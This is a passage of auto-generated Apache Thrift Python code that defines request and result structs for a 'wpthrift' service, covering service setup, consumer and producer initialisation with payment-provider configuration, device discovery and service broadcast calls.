iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setup_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name.encode('utf-8') if sys.version_info[0] == 2 else self.name)
oprot.writeFieldEnd()
if self.description is not None:
oprot.writeFieldBegin('description', TType.STRING, 2)
oprot.writeString(self.description.encode('utf-8') if sys.version_info[0] == 2 else self.description)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class setup_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setup_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addService_args(object):
"""
Attributes:
- svc
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'svc', (wpthrift_types.ttypes.Service, wpthrift_types.ttypes.Service.thrift_spec), None, ), # 1
)
def __init__(self, svc=None,):
self.svc = svc
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.svc = wpthrift_types.ttypes.Service()
self.svc.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addService_args')
if self.svc is not None:
oprot.writeFieldBegin('svc', TType.STRUCT, 1)
self.svc.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addService_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addService_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class removeService_args(object):
"""
Attributes:
- svc
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'svc', (wpthrift_types.ttypes.Service, wpthrift_types.ttypes.Service.thrift_spec), None, ), # 1
)
def __init__(self, svc=None,):
self.svc = svc
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.svc = wpthrift_types.ttypes.Service()
self.svc.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('removeService_args')
if self.svc is not None:
oprot.writeFieldBegin('svc', TType.STRUCT, 1)
self.svc.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class removeService_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('removeService_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initConsumer_args(object):
"""
Attributes:
- scheme
- hostname
- port
- urlPrefix
- clientID
- hceCard
- pspConfig
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'scheme', 'UTF8', None, ), # 1
(2, TType.STRING, 'hostname', 'UTF8', None, ), # 2
(3, TType.I32, 'port', None, None, ), # 3
(4, TType.STRING, 'urlPrefix', 'UTF8', None, ), # 4
(5, TType.STRING, 'clientID', 'UTF8', None, ), # 5
(6, TType.STRUCT, 'hceCard', (wpthrift_types.ttypes.HCECard, wpthrift_types.ttypes.HCECard.thrift_spec), None, ), # 6
(7, TType.MAP, 'pspConfig', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 7
)
def __init__(self, scheme=None, hostname=None, port=None, urlPrefix=None, clientID=None, hceCard=None, pspConfig=None,):
self.scheme = scheme
self.hostname = hostname
self.port = port
self.urlPrefix = urlPrefix
self.clientID = clientID
self.hceCard = hceCard
self.pspConfig = pspConfig
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.scheme = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.hostname = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.port = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.urlPrefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.clientID = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.hceCard = wpthrift_types.ttypes.HCECard()
self.hceCard.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.MAP:
self.pspConfig = {}
(_ktype1, _vtype2, _size0) = iprot.readMapBegin()
for _i4 in range(_size0):
_key5 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val6 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.pspConfig[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initConsumer_args')
if self.scheme is not None:
oprot.writeFieldBegin('scheme', TType.STRING, 1)
oprot.writeString(self.scheme.encode('utf-8') if sys.version_info[0] == 2 else self.scheme)
oprot.writeFieldEnd()
if self.hostname is not None:
oprot.writeFieldBegin('hostname', TType.STRING, 2)
oprot.writeString(self.hostname.encode('utf-8') if sys.version_info[0] == 2 else self.hostname)
oprot.writeFieldEnd()
if self.port is not None:
oprot.writeFieldBegin('port', TType.I32, 3)
oprot.writeI32(self.port)
oprot.writeFieldEnd()
if self.urlPrefix is not None:
oprot.writeFieldBegin('urlPrefix', TType.STRING, 4)
oprot.writeString(self.urlPrefix.encode('utf-8') if sys.version_info[0] == 2 else self.urlPrefix)
oprot.writeFieldEnd()
if self.clientID is not None:
oprot.writeFieldBegin('clientID', TType.STRING, 5)
oprot.writeString(self.clientID.encode('utf-8') if sys.version_info[0] == 2 else self.clientID)
oprot.writeFieldEnd()
if self.hceCard is not None:
oprot.writeFieldBegin('hceCard', TType.STRUCT, 6)
self.hceCard.write(oprot)
oprot.writeFieldEnd()
if self.pspConfig is not None:
oprot.writeFieldBegin('pspConfig', TType.MAP, 7)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.pspConfig))
for kiter7, viter8 in self.pspConfig.items():
oprot.writeString(kiter7.encode('utf-8') if sys.version_info[0] == 2 else kiter7)
oprot.writeString(viter8.encode('utf-8') if sys.version_info[0] == 2 else viter8)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initConsumer_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initConsumer_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initProducer_args(object):
"""
Attributes:
- pspConfig
"""
thrift_spec = (
None, # 0
(1, TType.MAP, 'pspConfig', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 1
)
def __init__(self, pspConfig=None,):
self.pspConfig = pspConfig
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.pspConfig = {}
(_ktype10, _vtype11, _size9) = iprot.readMapBegin()
for _i13 in range(_size9):
_key14 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val15 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.pspConfig[_key14] = _val15
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initProducer_args')
if self.pspConfig is not None:
oprot.writeFieldBegin('pspConfig', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.pspConfig))
for kiter16, viter17 in self.pspConfig.items():
oprot.writeString(kiter16.encode('utf-8') if sys.version_info[0] == 2 else kiter16)
oprot.writeString(viter17.encode('utf-8') if sys.version_info[0] == 2 else viter17)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initProducer_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initProducer_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getDevice_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getDevice_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getDevice_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.Device, wpthrift_types.ttypes.Device.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.Device()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getDevice_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class startServiceBroadcast_args(object):
"""
Attributes:
- timeoutMillis
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'timeoutMillis', None, None, ), # 1
)
def __init__(self, timeoutMillis=None,):
self.timeoutMillis = timeoutMillis
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.timeoutMillis = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('startServiceBroadcast_args')
if self.timeoutMillis is not None:
oprot.writeFieldBegin('timeoutMillis', TType.I32, 1)
oprot.writeI32(self.timeoutMillis)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class startServiceBroadcast_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('startServiceBroadcast_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stopServiceBroadcast_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stopServiceBroadcast_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stopServiceBroadcast_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stopServiceBroadcast_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deviceDiscovery_args(object):
"""
Attributes:
- timeoutMillis
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'timeoutMillis', None, None, ), # 1
)
def __init__(self, timeoutMillis=None,):
self.timeoutMillis = timeoutMillis
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.timeoutMillis = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deviceDiscovery_args')
if self.timeoutMillis is not None:
oprot.writeFieldBegin('timeoutMillis', TType.I32, 1)
oprot.writeI32(self.timeoutMillis)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deviceDiscovery_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.SET, 'success', (TType.STRUCT, (wpthrift_types.ttypes.ServiceMessage, wpthrift_types.ttypes.ServiceMessage.thrift_spec), False), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype21, _size18) = iprot.readSetBegin()
for _i22 in range(_size18):
_elem23 = wpthrift_types.ttypes.ServiceMessage()
_elem23.read(iprot)
self.success.add(_elem23)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deviceDiscovery_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.STRUCT, len(self.success))
for iter24 in self.success:
iter24.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class requestServices_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('requestServices_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class requestServices_result(object):
"""
Attributes:
- success
- err
"""
